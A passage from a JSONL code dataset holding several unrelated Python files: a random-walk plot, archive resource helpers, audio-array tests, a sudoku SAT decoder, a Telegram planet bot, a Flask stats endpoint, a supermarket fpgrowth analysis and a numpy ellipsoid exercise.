fill_walk(self):\n while len(self.x_values) < self.num_points:\n x_choice = choice([-1, 1, 0.5, -0.5])\n x_distance = choice([0, 1, 2, 3, 4, 5, 6, 7, 8])\n x_step = x_choice * x_distance\n\n y_choice = choice([-1, 1])\n y_distance = choice([0, 1, 2, 3, 4])\n y_step = y_choice * y_distance\n\n if x_step == 0 and y_step == 0:\n continue\n\n x = self.x_values[-1] + x_step\n y = self.y_values[-1] + y_step\n\n self.x_values.append(x)\n self.y_values.append(y)\n\n\nwhile True:\n\n rw = RandomWalk2(50_000)\n rw.fill_walk()\n\n plt.style.use('classic')\n fig, ax = plt.subplots(figsize=(19, 10))\n point_numbers = range(rw.num_points)\n ax.scatter(rw.x_values, rw.y_values, c=point_numbers, cmap=plt.cm.Greens,\n edgecolors='None', s=2)\n # start point and the end point\n ax.scatter(0, 0, c='purple', edgecolors='None', s=100)\n ax.scatter(rw.x_values[-1], rw.y_values[-1], c='red',\n edgecolors='None', s=100)\n # x-axis and y-axis set the same step\n ax.set_aspect('equal')\n\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n\n plt.show()\n\n keep_running = input(\"Make another walk? (y/n): \")\n if keep_running == 'n':\n break\n","repo_name":"amazing-2020/pdf","sub_path":"Python/PythonCrashCourse/project2/chapter15/having a try/exercise15-4.py","file_name":"exercise15-4.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24350287785","text":"import sys\nimport os\nimport re\nimport zipfile\nimport tarfile\nimport io\n\n__all__ = [\"open_zipfile\", \"open_tarfile\", \"open_url\", \"Resources\"]\n\n# Python 3.x workarounds for the changed urllib modules.\nif sys.version_info[0] >= 3:\n import urllib.parse as urlparse\n import urllib.request as urllib2\nelse:\n import urlparse\n import urllib2\n\n\ndef _validate_path(path, what, write=False):\n fullpath = os.path.abspath(path)\n fname = os.path.basename(path)\n if write:\n parent = os.path.abspath(os.path.join(fullpath, os.pardir))\n if not os.path.isdir(parent):\n e = \"The given parent directory '{0}' does not exist\"\n raise IOError(e.format(parent))\n else:\n if not os.path.exists(fullpath):\n e = \"Could not find {0} at the given path: {1}\"\n raise IOError(e.format(what, fullpath))\n return (fullpath, fname)\n\n\ndef open_zipfile(archive, filename, directory=None):\n \"\"\"Retrieves a given file from a ZIP archive.\n\n Args:\n archive (:obj:`~zipfile.ZipFile`, str): The ZipFile object or path to\n the ZIP archive containing the desired file.\n filename (str): The name of the file to retrieve from the archive.\n directory (str, optional): The path to the directory within the archive\n containing the file to retrieve. 
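# Hedged usage sketch for open_zipfile as documented here (archive and member
# names are hypothetical; the function returns an io.BytesIO):
data = open_zipfile("assets.zip", "sprite.png", directory="images")
header = data.read(8)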
Defaults to the root level of the\n archive.\n\n Returns:\n :obj:`~io.BytesIO`: A Python bytestream object containing the requested\n file.\n\n Raises:\n KeyError: If the given file could not be found within the archive.\n TypeError: If the archive is not a valid ZIP archive.\n\n \"\"\"\n data = None\n opened = False\n\n if not isinstance(archive, zipfile.ZipFile):\n if not zipfile.is_zipfile(archive):\n raise TypeError(\"passed file does not seem to be a ZIP archive\")\n else:\n archive = zipfile.ZipFile(archive, 'r')\n opened = True\n\n apath = filename\n if directory:\n apath = \"%s/%s\" % (directory, filename)\n\n try:\n dmpdata = archive.open(apath)\n data = io.BytesIO(dmpdata.read())\n finally:\n if opened:\n archive.close()\n return data\n\n\ndef open_tarfile(archive, filename, directory=None, ftype=None):\n \"\"\"Retrieves a given file from a TAR archive.\n\n If the TAR archive uses ``.tar.gz`` or ``.tar.bz2`` compression and the\n file name does not contain either of these identifiers, the compression\n type must be manually specified.\n\n Args:\n archive (:obj:`~tarfile.TarFile`, str): The TarFile object or path to\n the TAR archive containing the desired file.\n filename (str): The name of the file to retrieve from the archive.\n directory (str, optional): The path to the directory within the archive\n containing the file to retrieve. Defaults to the root level of the\n archive.\n ftype (str, optional): The compression type (if any) used for the TAR\n file, can be either 'gz', 'bz2', or None (no compression). If not\n specified, will default to assuming no compression.\n\n Returns:\n :obj:`~io.BytesIO`: A Python bytestream object containing the requested\n file.\n\n Raises:\n KeyError: If the given file could not be found within the archive.\n TypeError: If the archive is not a supported TAR archive.\n\n \"\"\"\n data = None\n opened = False\n\n if not isinstance(archive, tarfile.TarFile):\n if not tarfile.is_tarfile(archive):\n raise TypeError(\"passed file does not seem to be a TAR archive\")\n else:\n file_ext = archive.split('.')[-1]\n if not ftype and file_ext in ('gz', 'bz2'):\n ftype = file_ext\n if ftype and ftype not in ('gz', 'bz2'):\n e = \"invalid TAR compression type '{0}' (must be 'gz' or 'bz2')\"\n raise TypeError(e.format(ftype))\n mode = 'r:{0}'.format(ftype) if ftype else 'r'\n archive = tarfile.open(archive, mode)\n opened = True\n\n apath = filename\n if directory:\n apath = \"%s/%s\" % (directory, filename)\n\n try:\n dmpdata = archive.extractfile(apath)\n data = io.BytesIO(dmpdata.read())\n finally:\n if opened:\n archive.close()\n return data\n\n\ndef open_url(filename, basepath=None):\n # Opens and reads a certain file from a web or remote location.\n # Deprecated because its argument names are confusing and because\n # users are probably better off using urllib directly.\n url = filename\n if basepath:\n url = urlparse.urljoin(basepath, filename)\n return urllib2.urlopen(url)\n\n\nclass Resources(object):\n \"\"\"A container class for managing application resource files.\n \n This class eases access to resources by allowing access using relative\n paths, scanning archives to locate files, and more.\n\n Args:\n path (str, optional): The path of a resource directory with which to\n initialze the container. Defaults to ``None``.\n subdir (str, optional): Deprecated, do not use.\n excludepattern (str, optional): A regular expression indicating\n which directories (if any) to ignore if initializing the\n container with a resource path. 
Defaults to ``None``.\n\n \"\"\"\n def __init__(self, path=None, subdir=None, excludepattern=None):\n self.files = {}\n if path:\n self.scan(path, subdir, excludepattern)\n\n def _scanzip(self, filename):\n \"\"\"Scans the passed ZIP archive and indexes all the files\n contained by it.\n \"\"\"\n if not zipfile.is_zipfile(filename):\n raise TypeError(\"file '%s' is not a valid ZIP archive\" % filename)\n archname = os.path.abspath(filename)\n zipf = zipfile.ZipFile(filename, 'r')\n for path in zipf.namelist():\n fname = os.path.split(path)[1]\n if fname:\n self.files[fname] = (archname, 'zip', path)\n zipf.close()\n\n def _scantar(self, filename, ftype=None):\n \"\"\"Scans the passed TAR archive and indexes all the files\n contained by it.\n \"\"\"\n if not tarfile.is_tarfile(filename):\n raise TypeError(\"file '%s' is not a valid TAR archive\" % filename)\n file_ext = filename.split('.')[-1]\n if not ftype and file_ext in ('gz', 'bz2'):\n ftype = file_ext\n if ftype and ftype not in ('gz', 'bz2'):\n e = \"invalid TAR compression type '{0}' (must be 'gz' or 'bz2')\"\n raise TypeError(e.format(ftype))\n mode = 'r:{0}'.format(ftype) if ftype else 'r'\n archname = os.path.abspath(filename)\n archtype = 'tar'\n if ftype:\n archtype = 'tar%s' % ftype\n tar = tarfile.open(filename, mode)\n for path in tar.getnames():\n fname = os.path.split(path)[1]\n self.files[fname] = (archname, archtype, path)\n tar.close()\n\n def add(self, filename):\n \"\"\"Adds a file to the Resources container.\n\n If the given file is a supported archive, its contents will be scanned\n and added to the container.\n\n Args:\n filename (str): The filepath of the resource to add to the\n container.\n\n Raises:\n ValueError: If the file does not exist at the provided path.\n\n \"\"\"\n if not os.path.exists(filename):\n raise ValueError(\"invalid file path\")\n if zipfile.is_zipfile(filename):\n self.add_archive(filename)\n elif tarfile.is_tarfile(filename):\n self.add_archive(filename, 'tar')\n else:\n self.add_file(filename)\n\n def add_file(self, filename):\n \"\"\"Adds a file without scanning to the Resources container.\n\n Unlike :meth:`add`, this method will not attempt to add the contents\n of any provided archives to the container.\n\n Args:\n filename (str): The filepath of the resource to add to the\n container.\n\n Raises:\n ValueError: If the file does not exist at the provided path.\n\n \"\"\"\n if not os.path.exists(filename):\n raise ValueError(\"invalid file path\")\n abspath = os.path.abspath(filename)\n fname = os.path.split(abspath)[1]\n if not fname:\n raise ValueError(\"invalid file path\")\n self.files[fname] = (None, None, abspath)\n\n def add_archive(self, filename, typehint='zip'):\n \"\"\"Adds a ``.zip`` or ``.tar`` archive to the container.\n\n This will scan the passed archive and add its contents to the\n list of available resources. Currently ``.zip``, ``.tar``,\n ``.tar.bz2``, and ``.tar.gz`` formats are supported.\n\n Args:\n filename (str): The filepath of the archive to scan and add to the\n container.\n typehint (str, optional): The format of the archive to add to the\n container, required if using a custom file extension. Must be\n one of ``zip``, ``tar``, ``tarbz2``, or ``targz``. 
Defaults to\n ``zip`` if not specified.\n\n Raises:\n ValueError: If the file does not exist at the provided path, or if\n the file is not a supported archive type.\n\n \"\"\"\n if not os.path.exists(filename):\n raise ValueError(\"invalid file path\")\n fname = os.path.basename(filename)\n if 'zip' in fname.split('.'):\n self._scanzip(filename)\n elif 'tar' in fname.split('.'):\n self._scantar(filename)\n else:\n if typehint == 'zip':\n self._scanzip(filename)\n elif typehint == 'tar':\n self._scantar(filename)\n elif typehint == 'tarbz2':\n self._scantar(filename, 'bz2')\n elif typehint == 'targz':\n self._scantar(filename, 'gz')\n else:\n raise ValueError(\"unsupported archive type\")\n\n def get(self, filename):\n \"\"\"Retrieves a resource file by name from the container.\n\n Args:\n filename (str): The file name of the resource to retrieve.\n\n Returns:\n :obj:`~io.BytesIO`: A Python bytestream object containing the\n retrieved resource file.\n\n Raises:\n KeyError: If the given file could not be found.\n\n \"\"\"\n archive, ftype, pathname = self.files[filename]\n if archive:\n if ftype == 'zip':\n return open_zipfile(archive, pathname)\n elif ftype == 'tar':\n return open_tarfile(archive, pathname)\n elif ftype == 'tarbz2':\n return open_tarfile(archive, pathname, ftype='bz2')\n elif ftype == 'targz':\n return open_tarfile(archive, pathname, ftype='gz')\n else:\n raise ValueError(\"unsupported archive type\")\n dmpdata = open(pathname, 'rb')\n data = io.BytesIO(dmpdata.read())\n dmpdata.close()\n return data\n\n def get_filelike(self, filename):\n # Deprecated, doesn't make much difference in Python 3\n archive, ftype, pathname = self.files[filename]\n if archive:\n if ftype == 'zip':\n return open_zipfile(archive, pathname)\n elif ftype == 'tar':\n return open_tarfile(archive, pathname)\n elif ftype == 'tarbz2':\n return open_tarfile(archive, pathname, ftype='bz2')\n elif ftype == 'targz':\n return open_tarfile(archive, pathname, ftype='gz')\n else:\n raise ValueError(\"unsupported archive type\")\n return open(pathname, 'rb')\n\n def get_path(self, filename):\n \"\"\"Gets the path of a given resource file.\n\n If the file is only available within an archive, a string in the form\n ``filename@archivename`` will be returned.\n\n Args:\n filename (str): The file name of the resource to locate.\n\n Returns:\n str: The absolute path of the resource file, or the archive\n identifier string if the resource is inside an archive.\n\n Raises:\n KeyError: If the given file could not be found.\n\n \"\"\"\n archive, ftype, pathname = self.files[filename]\n if archive:\n return '%s@%s' % (pathname, archive)\n return pathname\n\n def scan(self, path, subdir=None, excludepattern=None):\n \"\"\"Scans a path, adding all matching files to the container.\n\n If a located file is a ``.zip`` or ``.tar`` archive, its\n contents will be indexed and added to the container automatically.\n\n Args:\n path (str): The path of the directory to scan.\n subdir (str, optional): Deprecated, do not use.\n excludepattern (str, optional): A regular expression indicating\n which directories (if any) within the file structure of the\n given path to exclude from indexing. Defaults to ``None``. 
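# Hedged usage sketch tying scan(), get() and get_path() together (directory and
# file names hypothetical):
res = Resources(path="assets", excludepattern=r".*/private")
logo = res.get("logo.png")        # io.BytesIO, wherever the file was indexed
print(res.get_path("logo.png"))   # plain path, or "member@archive" for archives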
\n\n Raises:\n ValueError: If the specified path does not exist.\n\n \"\"\"\n match = None\n if excludepattern:\n match = re.compile(excludepattern).match\n join = os.path.join\n add = self.add\n abspath = os.path.abspath(path)\n if not os.path.exists(abspath):\n raise ValueError(\"invalid path '%s'\" % abspath)\n if not os.path.isdir(abspath):\n abspath = os.path.dirname(abspath)\n if subdir is not None:\n abspath = os.path.join(abspath, subdir)\n if not os.path.exists(abspath):\n raise ValueError(\"invalid path '%s'\" % abspath)\n for (pdir, dirnames, filenames) in os.walk(abspath):\n if match and match(pdir) is not None:\n continue\n for fname in filenames:\n add(join(pdir, fname))\n","repo_name":"juso40/bl2sdk_Mods","sub_path":"blimgui/dist/sdl2/ext/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":13976,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"61"} +{"seq_id":"32346428387","text":"import pytest\n\nimport numpy as np\n\nimport pylibrb\nfrom pylibrb import create_audio_array, reorder_to_rb, reorder_from_rb\n\n\ndef test_create_audio_array_should_create_array_with_correct_shape():\n audio = create_audio_array(2, 128)\n\n assert audio.shape[pylibrb.CHANNELS_AXIS] == 2\n assert audio.shape[pylibrb.SAMPLES_AXIS] == 128\n\n\ndef test_create_audio_array_should_create_array_with_correct_value():\n audio = create_audio_array(2, 128, 321)\n\n assert np.all(audio == 321)\n\n\ndef test_reorder_to_rb_should_raise_index_error_when_bad_samples_axis():\n audio = create_audio_array(2, 128)\n\n with pytest.raises(IndexError):\n reorder_to_rb(audio, samples_axis=2)\n\n\ndef test_reorder_to_rb_should_do_nothing_when_audio_with_correct_layout():\n audio = create_audio_array(2, 128)\n\n audio_reordered = reorder_to_rb(audio, samples_axis=pylibrb.SAMPLES_AXIS)\n\n assert audio_reordered.shape == audio.shape\n\n\ndef test_reorder_to_rb_should_reorder_audio_array_when_audio_with_wrong_layout():\n audio = create_audio_array(2, 128)\n\n # pass transposed audio array and thus also transposed samples axis (i.e. 
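# A numpy-only sketch of the shape contract reorder_to_rb is tested for here:
# move the chosen samples axis into place and fold every other axis into channels.
# (This assumes CHANNELS_AXIS == 0 and SAMPLES_AXIS == 1; the element ordering of
# the real implementation is not pinned down by these tests.)
import numpy as np

def reorder_to_rb_shape_sketch(audio, samples_axis):
    moved = np.moveaxis(audio, samples_axis, -1)   # samples last
    return moved.reshape(-1, moved.shape[-1])      # remaining axes -> channels

x = np.zeros((2, 4, 8, 4))
assert reorder_to_rb_shape_sketch(x, samples_axis=2).shape == (2 * 4 * 4, 8)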
channels axis)\n audio_reordered = reorder_to_rb(audio.T, samples_axis=pylibrb.CHANNELS_AXIS)\n\n assert audio_reordered.shape == audio.shape\n\n\ndef test_reorder_to_rb_should_reorder_audio_array_when_audio_with_wrong_complex_layout():\n audio = create_audio_array(1, 2 * 4 * 8 * 4).reshape(2, 4, 8, 4)\n\n audio_reordered = reorder_to_rb(audio, samples_axis=2) # select 3rd axis of shape 8\n\n expected_shape = [8, 8]\n expected_shape[pylibrb.CHANNELS_AXIS] = 2 * 4 * 1 * 4\n assert audio_reordered.shape == tuple(expected_shape)\n\n\ndef test_reorder_from_rb_should_raise_value_error_when_missing_None_in_wanted_shape():\n audio = create_audio_array(2, 128)\n\n with pytest.raises(ValueError):\n reorder_from_rb(audio, wanted_shape=(2, 128))\n\n\ndef test_reorder_from_rb_should_do_nothing_when_audio_with_correct_layout():\n rb_audio = create_audio_array(2, 128)\n\n wanted_shape = [-1, -1]\n wanted_shape[pylibrb.SAMPLES_AXIS] = None\n audio_reordered = reorder_from_rb(rb_audio, wanted_shape=wanted_shape)\n\n assert audio_reordered.shape == rb_audio.shape\n\n\ndef test_reorder_from_rb_should_reorder_audio_array_when_audio_with_wrong_layout():\n rb_audio = create_audio_array(2, 128)\n\n # pass samples axis as channels axis\n wanted_shape = [2, 2]\n wanted_shape[pylibrb.CHANNELS_AXIS] = None\n audio_reordered = reorder_from_rb(rb_audio, wanted_shape=wanted_shape)\n\n assert audio_reordered.shape == rb_audio.T.shape\n\n\ndef test_reorder_from_rb_should_reorder_audio_array_when_audio_with_wrong_complex_layout():\n audio = create_audio_array(24, 128).reshape(1, 2, 128, 3, 4)\n audio[0, 0, :, 0, 0] = np.arange(128)\n audio[-1, -1, :, -1, -1] = np.arange(128, 2 * 128)\n\n rb_audio = reorder_to_rb(audio, samples_axis=2)\n audio_reordered = reorder_from_rb(rb_audio, wanted_shape=[1, 2, None, 3, 4])\n\n assert audio_reordered.shape == audio.shape\n assert np.array_equal(audio[0, 0, :, 0, 0], np.arange(128))\n assert np.array_equal(audio[-1, -1, :, -1, -1], np.arange(128, 2 * 128))\n","repo_name":"pawel-glomski/pylibrb","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":3074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35060089756","text":"import sys\n\nfo = open(\"answer2.txt\",\"r\")\nfinq = open(\"finalanswer.txt\",\"a\")\nlines=fo.read().split(\"\\n\")\nif lines[0]==\"UNSAT\":\n\tfinq.write(\"UNSAT\\n\")\n\tsys.exit()\ndel lines[0]\ndel lines[-1]\nlines=lines[0].split(\" \")\ndel lines[-1]\nfor i in lines:\n\tif i[0]!= '-':\n\t\tif int(i)%9!=0:\n\t\t\tfinq.write(str(int(i)%9))\n\t\telse : finq.write(\"9\")\nfinq.write(\"\\n\")\n","repo_name":"dragoste17/course-projects","sub_path":"Sudoku Solver/Problem2/q2helper.py","file_name":"q2helper.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19987637710","text":"import logging\nimport sys\nimport RPCClient\nimport json\nimport time\n\nlogging.basicConfig(level=logging.INFO)\nM = RPCClient.RPCClient()\nid = sys.argv[1]\ntime.sleep(1) # Allow subscribers to connect\nM.when_set_filter(\"CLAIM[global/papers]\")\n\nwhile True:\n string = M.when_recv()\n msg_prefix = string.split(']', 1)[0] + \"]\"\n papers = json.loads(string[len(msg_prefix):])\n ill = M.new_illumination(\"global\")\n ill.fill(0, 255, 0, 99)\n for paper in papers:\n if len(paper[\"corners\"]) == 4:\n tri1 = []\n tri2 = []\n for corner in paper[\"corners\"]:\n if corner[\"CornerId\"] 
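# The SAT decoder above maps a positive variable to a digit with int(i) % 9 plus a
# special case for 9; a sketch of the equivalent branch-free form (assuming the
# same 1-based, nine-variables-per-cell encoding):
def variable_to_digit(v):
    return (v - 1) % 9 + 1

assert [variable_to_digit(v) for v in (1, 9, 10, 18)] == [1, 9, 1, 9]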
in [0,1,2]:\n tri1.append(corner)\n if corner[\"CornerId\"] in [2,3,0]:\n tri2.append(corner)\n ill.polygon(list(map(lambda c: (c[\"x\"], c[\"y\"]), tri1)))\n ill.polygon(list(map(lambda c: (c[\"x\"], c[\"y\"]), tri2)))\n M.wish(\"DRAW\", id, ill.package())\n","repo_name":"jhaip/wysiwyog","sub_path":"programs/show-papers--1924.py","file_name":"show-papers--1924.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19597700689","text":"from telegram.ext import Updater, CommandHandler, MessageHandler, Filters\nimport logging\nfrom datetime import datetime\nimport ephem\nimport os\n\n\ndef get_now():\n return datetime.now().strftime('%Y%m%d_%H%M%S')\n\n\ndef get_current_date():\n return datetime.now().strftime('%Y%m%d_%H%M%S')\n\n\nlog_dir_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'logs')\nos.makedirs(log_dir_path, exist_ok=True)\nlogging.basicConfig(format='%(name)s - %(levelname)s - %(message)s',\n level=logging.INFO,\n filename=f\"logs/bot_{datetime.now().strftime('%Y%m%d_%H%M%S')}.log\"\n )\n\nPROXY = {'proxy_url': 'socks5://t1.learn.python.ru:1080',\n 'urllib3_proxy_kwargs': {'username': 'learn', 'password': 'python'}}\n\n\ndef greet_user(bot, update):\n text = 'Вызван /start'\n print(text)\n update.message.reply_text(text)\n\n\ndef talk_to_me(bot, update):\n user_text = update.message.text\n print(user_text)\n update.message.reply_text(user_text)\n\n\ndef planet_detector(bot, update):\n try:\n _planet_candidate = update.message.text.split('planet')[1].strip()\n planet_name = getattr(ephem, _planet_candidate)(datetime.today())\n constellation = ephem.constellation(planet_name)\n update.message.reply_text(f'Planet: {planet_name.name} in constellation: {constellation[1]}')\n except Exception as err:\n print(f'{get_now()} Error {err}')\n x = [name for id, type, name in ephem._libastro.builtin_planets() if type == 'Planet' and name not in ('Sun', 'Moon')]\n all_planet_list = '\\n/planet '.join(x)\n update.message.reply_text(f'Choose one of this planet:\\n/planet {all_planet_list}')\n\n\ndef main():\n mybot = Updater('API_KEY', request_kwargs=PROXY)\n\n dp = mybot.dispatcher\n dp.add_handler(CommandHandler(\"start\", greet_user))\n dp.add_handler(CommandHandler(\"planet\", planet_detector))\n dp.add_handler(MessageHandler(Filters.text, talk_to_me))\n mybot.start_polling()\n mybot.idle()\n\n\nmain()\n","repo_name":"xtreezzz/msp_lesson2","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5291721172","text":"from flask import Blueprint, jsonify\nfrom db import get_db\nfrom pymysql.cursors import DictCursor\n\nfrom wikispeedruns import stats\nfrom util.decorators import check_admin\nfrom util.lock_utils import locked\nfrom util.process_utils import start_process_with_db\n\nstats_api = Blueprint(\"stats\", __name__, url_prefix=\"/api/stats\")\n\ndef _calc_stats(lock):\n with lock:\n stats.calculate()\n\n@stats_api.get(\"/calculate\")\n@check_admin\ndef calculate_stats():\n if locked(stats.calc_stat_lock):\n return 'Stat calculation in progress, check back later.', 503\n\n start_process_with_db(_calc_stats, (stats.calc_stat_lock,))\n return 'Success', 200\n\n@stats_api.get(\"/all\")\n@check_admin\ndef get_total_stats():\n # see https://stackoverflow.com/a/67266529/5613935 for some issues with doing this other ways\n 
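# Minimal sketch of the quad-to-triangle split drawn above: CornerIds (0, 1, 2)
# and (2, 3, 0) divide the paper along its 2-0 diagonal so two polygon fills
# cover the whole quad:
def quad_to_triangles(corners):
    """corners: four (x, y) points indexed by CornerId."""
    return (corners[0], corners[1], corners[2]), (corners[2], corners[3], corners[0])

tri1, tri2 = quad_to_triangles([(0, 0), (1, 0), (1, 1), (0, 1)])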
most_recent_stats_query = \"\"\"\n SELECT \n stats_json, \n DATE_FORMAT(timestamp, '%Y-%m-%dT%TZ') AS timestamp\n FROM `computed_stats`\n WHERE timestamp IN (SELECT MAX(timestamp) FROM `computed_stats`);\n \"\"\"\n\n db = get_db()\n with db.cursor(cursor=DictCursor) as cursor:\n cursor.execute(most_recent_stats_query)\n return jsonify(cursor.fetchall()[0])\n","repo_name":"wikispeedruns/wikipedia-speedruns","sub_path":"apis/stats_api.py","file_name":"stats_api.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"61"} +{"seq_id":"29874988260","text":"\"\"\"\nMain module for Analysis of input files for Supermarket analysis Data Science Project\n\"\"\"\n\n\nimport time\nimport json\nfrom pprint import pprint\nfrom fpgrowth_py.fpgrowth import fpgrowthFromFile\n\nimport os\nimport sys\nimport traceback\nfrom os import mkdir\nfrom os.path import isdir\nfrom shutil import rmtree\nfrom multiprocessing import Process\nfrom utils.Reader import Reader\nfrom utils.Writer import Writer\n\n\ndef prep_part_1():\n def recreate_folders(path):\n if isdir(path):\n rmtree(path)\n mkdir(path)\n\n recreate_folders(\"resources/customers\")\n recreate_folders(\"resources/fpgrowth_checkpoint\")\n recreate_folders(\"resources/products_checkpoint\")\n\ndef prep_part_2():\n\n def elim_file(path):\n if os.path.isfile(path):\n os.remove(path)\n\n elim_file('resources/customers_final.json')\n elim_file('resources/products_final.json')\n elim_file('resources/fpgrowth_final.csv')\n\ndef do_etl_part_1():\n\n PRODUTOS = \"resources/Products.txt\"\n RECPT_TMPLT = \"resources/receipts/\"\n EXPLN_TMPLT = \"resources/explanations/\"\n NUMFOLDERS = 50\n\n try:\n # TODO : COMMENT IF USING CHECKPOINT\n # prep_part_1()\n products_df = Reader.read_produtos(PRODUTOS)\n processes = []\n\n for i in range(NUMFOLDERS):\n args = (\n RECPT_TMPLT,\n EXPLN_TMPLT,\n products_df,\n i,\n )\n p = Process(target=Reader.read_receipts, args=args)\n p.start()\n processes.append(p)\n\n for p in processes:\n p.join()\n\n # partial_receipts = partial(Reader.read_receipts, RECPT_TMPLT, EXPLN_TMPLT, products_df)\n # with ProcessPoolExecutor() as executor:\n # executor.map(partial_receipts, NUMFOLDERSP)\n\n # for i in range(NUMFOLDERS):\n # Reader.read_receipts(RECPT_TMPLT, EXPLN_TMPLT, products_df, i)\n\n except Exception:\n traceback.print_exception(*sys.exc_info())\n\ndef do_etl_part_2():\n\n PRODUTOS = \"resources/Products.txt\"\n NUMFOLDERS = 50\n\n try:\n prep_part_2()\n products_df = Reader.read_produtos(PRODUTOS)\n Reader.combine_checkpoints(NUMFOLDERS, products_df)\n except Exception:\n traceback.print_exception(*sys.exc_info())\n\ndef last_pass():\n\n CUSTOMERS_PATH = \"resources/customers_final.json\"\n PRODUCTS_PATH = \"resources/products_final.json\"\n\n try:\n Reader.analyze_finals(CUSTOMERS_PATH, PRODUCTS_PATH)\n except Exception:\n traceback.print_exception(*sys.exc_info())\n\ndef do_fpgrowth():\n\n FPGROWTH_PATH = \"resources/fpgrowth_final.csv\"\n print('Timing fpgrowth\\n')\n\n # Results give first the itemset and then the rules\n\n s1 = time.time()\n results = fpgrowthFromFile(FPGROWTH_PATH, 0.5, 0)\n f1 = time.time()\n\n freqset = results[0]\n rules = results[1]\n\n print(f'Time -- 0.5 CONF -- {f1-s1}')\n pprint(freqset)\n pprint(rules)\n\n print('---------------------------')\n\n s2 = time.time()\n results2 = fpgrowthFromFile(FPGROWTH_PATH, 0.1, 0)\n f2 = time.time()\n\n freqset2 = results2[0]\n rules2 = results2[1]\n\n print(f'Time -- 0.1 CONF -- 
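# Self-contained sketch of the "latest snapshot" query pattern above
# (in-memory table and values are hypothetical):
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE computed_stats (stats_json TEXT, timestamp TEXT)")
db.executemany("INSERT INTO computed_stats VALUES (?, ?)",
               [('{"runs": 1}', "2023-01-01"), ('{"runs": 2}', "2023-02-01")])
row = db.execute(
    "SELECT stats_json, timestamp FROM computed_stats "
    "WHERE timestamp IN (SELECT MAX(timestamp) FROM computed_stats)"
).fetchone()
assert row == ('{"runs": 2}', "2023-02-01")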
{f2-s2}')\n pprint(freqset2)\n pprint(rules2)\n\n print('---------------------------')\n\n s3 = time.time()\n results3 = fpgrowthFromFile(FPGROWTH_PATH, 0.05, 0)\n f3 = time.time()\n\n freqset3 = results3[0]\n rules3 = results3[1]\n\n print(f'Time -- 0.05 CONF -- {f3-s3}')\n pprint(freqset3)\n pprint(rules3)\n\n print('---------------------------')\n\n s4 = time.time()\n results4 = fpgrowthFromFile(FPGROWTH_PATH, 0.05, 0)\n f4 = time.time()\n\n freqset4 = results4[0]\n rules4 = results4[1]\n\n print(f'Time -- 0.01 CONF -- {f4-s4}')\n pprint(freqset4)\n pprint(rules4)\n\n print('---------------------------')\n\ndef main2():\n\n # Testing stuff\n\n PRODUTOS = \"resources/Products.txt\"\n products_final = \"resources/products_final.json\"\n products_df = Reader.read_produtos(PRODUTOS)\n\n # Número total de prateleiras para cada produto\n available = products_df['Total Prateleiras'].values\n assoc_dict = dict([(p,c+1) for (c,p) in enumerate(products_df.index)])\n\n ordered_profit = []\n\n def snd(tuple):\n return tuple[1]\n\n with open(products_final, 'r') as fin:\n prod_dict = json.load(fin)\n\n # lst = [(v['Name'], v['Profit']) for _,v in prod_dict.items()]\n lst = [(v['Name'], v['Sold']) for _,v in prod_dict.items()]\n slst = sorted(lst, key=snd, reverse=True)\n\n # Most sold first from the back\n for i,v in enumerate(slst):\n ordered_profit.append(assoc_dict[v[0]])\n\n sol = []\n i = 0\n\n while len(sol) < 248:\n\n product_code = ordered_profit[i]\n\n if available[product_code - 1] > 0:\n sol.append(product_code)\n available[product_code - 1] += (-1)\n\n i += 1\n if i == len(ordered_profit):\n i = 0\n\n pprint(ordered_profit)\n pprint(sol)\n\n sol.reverse()\n\n Writer.dump_data_csv_single('sales_conf.csv', sol)\n # Writer.dump_data_csv_single('profit_conf.csv', sol)\n\n\nif __name__ == \"__main__\":\n print(\"Which python interpreter is executing the file?\")\n print(sys.executable)\n\n # CORRECT ORDER OF EXECUTION\n\n # Segment the data in receipts and explanations\n # do_etl_part_1()\n\n # Recombine checkpoints and generate final files\n # do_etl_part_2()\n\n # Extract rules and itemsets\n # do_fpgrowth()\n\n # Analyze final customers, products and fpgrowth\n # last_pass()\n\n # Testing\n main2()\n","repo_name":"Dayveed117/thebest-supermarket","sub_path":"src/run_analysis.py","file_name":"run_analysis.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12995020369","text":"#%% IMPORTING PACKAGES\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#%%\n\ndef pontos_3d(P):\n np.random.seed(31)\n X = [2 * np.random.random_sample(P) - 1,\n 2 * np.random.random_sample(P) - 1,\n 2 * np.random.random_sample(P) - 1]\n X = np.array(X)\n Xp = []\n t1, t2, t3 = 0.5, 0.5, -0.9\n R1 = [[1, 0, 0], [0, np.cos(t1), -np.sin(t1)], [0, np.sin(t1), np.cos(t1)]]\n R2 = [[np.cos(t2), 0, np.sin(t2)], [0, 1, 0], [-np.sin(t2), 0, np.cos(t2)]]\n R3 = [[np.cos(t3), -np.sin(t3), 0], [np.sin(t3), np.cos(t3), 0], [0, 0, 1]]\n R = np.dot(np.dot(R1, R2), R3) \n for i in range(P):\n if ((X[0][i]**2)/0.85 + (X[1][i]**2)/0.41 + (X[2][i]**2)/0.626 - 1) < 0:\n Xp.append(np.dot(R, X[:,i]))\n return np.array(Xp)\n\n\ndef centraliza(X):\n P = len(X)\n s = X.shape[1]\n for i in range(P):\n s = s + X[i,:]\n X_mean = s / P\n X_centered = X - 